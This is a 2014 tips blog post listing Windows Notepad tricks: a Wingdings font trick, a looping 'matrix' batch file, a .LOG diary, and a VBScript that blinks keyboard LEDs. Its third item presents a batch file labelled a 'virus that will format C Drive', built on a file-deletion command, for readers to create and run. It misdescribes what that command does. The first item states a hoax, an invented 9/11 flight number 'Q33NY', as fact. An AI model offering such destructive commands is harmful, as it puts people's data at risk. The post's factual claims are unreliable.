Digital Tips n Tricks

  • Home
  • Mobile Tricks
    • Internet
    • Market
    • Stock
  • SmartPhones
    • Dvd
    • Games
    • Software
      • Office
  • Parent Category
    • Child Category 1
      • Sub Child Category 1
      • Sub Child Category 2
      • Sub Child Category 3
    • Child Category 2
    • Child Category 3
    • Child Category 4
  • Featured
  • Health
    • Childcare
    • Doctors
  • Uncategorized

Friday, September 5, 2014

Some Cool Notepad Tricks

 Tricks Spot     September 05, 2014     Notepad, Windows     No comments   



1. World Trade Center Attack Trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definitely amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.

    2. Increase the font size to 72.

    3. Change the Font to Wingdings.


2. Matrix Effect Trick


In this trick you have to make a batch file in notepad which will act as matrix effect that you might have seen in movies. Matrix effect is basically number flashes in green color.

    1. Open Notepad and copy below code into it.
         @echo off
          color 02
         :start
          echo %random% %random% %random% %random% %random% %random%      
          %random% %random% %random% %random%
          goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)

    3. Open your saved file and you will have matrix effect on your screen.


3. Creating Virus That Format C Drive


Follow the below steps to make a virus that will format C Drive.

    1. Open Notepad and copy below code into it.
       @Echo off
       Del C:\ *.* |y
 
    2. Then Save this file as virus.bat

    3. Now, running this file formats C Drive.


4. Making Personal Diary Using Notepad 


Use Notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter.

    2. Save the program with any name and close it.

    3. Open the file again. Now you can see current date and time, This will happen every time         you reopen notepad.



5. Dancing Keyboard Led



Follow the below steps to make an interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script here.

    1. Open Notepad and copy below codes into it.
         Set wshShell =wscript.CreateObject("WScript.Shell")
         do
         wscript.sleep 100
         wshshell.sendkeys "{CAPSLOCK}"
         wshshell.sendkeys "{NUMLOCK}"
         wshshell.sendkeys "{SCROLLLOCK}"
         loop


    2. Then save this file as dance.vbs (name can be anything but .vbs is must).


    3. Open your save file and see your keyboard led blinking like disco lights.



  • Share This:  
  •  Facebook
  •  Twitter
  •  Google+
  •  Stumble
  •  Digg
Email ThisBlogThis!Share to XShare to Facebook
Newer Post Older Post Home

0 comments:

Post a Comment

Popular Posts

  • How to Create a Password Protected Folder Without any Software
    Before you get started you need to create a folder that will store your password protected folder, this is just an ordinary folder and c...
  • How to use your Mobile as Wireless Mouse and Keyboard
    RemoteDroid turns your phone into a wireless keyboard and mouse with touchpad, using your wireless network. It's an application for p...
  • How to Reset the Trial Period of Software to work it Lifetime?
    Want to use the Trial or Evaluation copy of a Software for lifetime? It is possible. You can use the trial software for lifetime. Just Fol...
  • How to Install and Move Android Apps to SD Card
    Android apps install to the internal storage by default, but you can also set the SD card as your default install location. Follow the bel...

Recent Posts

LightBlog

Categories

Android (21) Apple (9) Cab (2) Chrome (5) Facebook (4) Food (1) Galaxy Tab (11) MAC (2) Macbook (3) Mobile (23) Notepad (3) Taxi (2) VLC (2) Whatsapp (1) Windows (27) YouTube (1)

Unordered List

Pages

  • Home

Text Widget

Blog Archive

Main Menu

  • Home
  • About
  • Contact
Powered by Blogger.

Report Abuse

About Me

Tricks Spot
View my complete profile

testing

A Snapshot is a point in time copy of volume which is used for backup & recovery. A snapshot is used to create a known state of volume ...

Put your ad code here

Total Pageviews

Menu

  • <i class="fa fa-cog"></i> Features
  • Mobile
  • Contact Us

Search This Blog

Social Media Icons

  • twitter
  • facebook
  • gplus
  • instagram
  • rss
  • youtube
  • pinterest

Translate

Social Media Icons

  • twitter
  • facebook
  • gplus
  • instagram
  • rss
  • youtube
  • pinterest

Recent News

Recent Post

Facebook

Comments

Recent

Featured Video

Sample Text

Copyright © Digital Tips n Tricks | Powered by Blogger
Design by Hardeep Asrani | Blogger Theme by NewBloggerThemes.com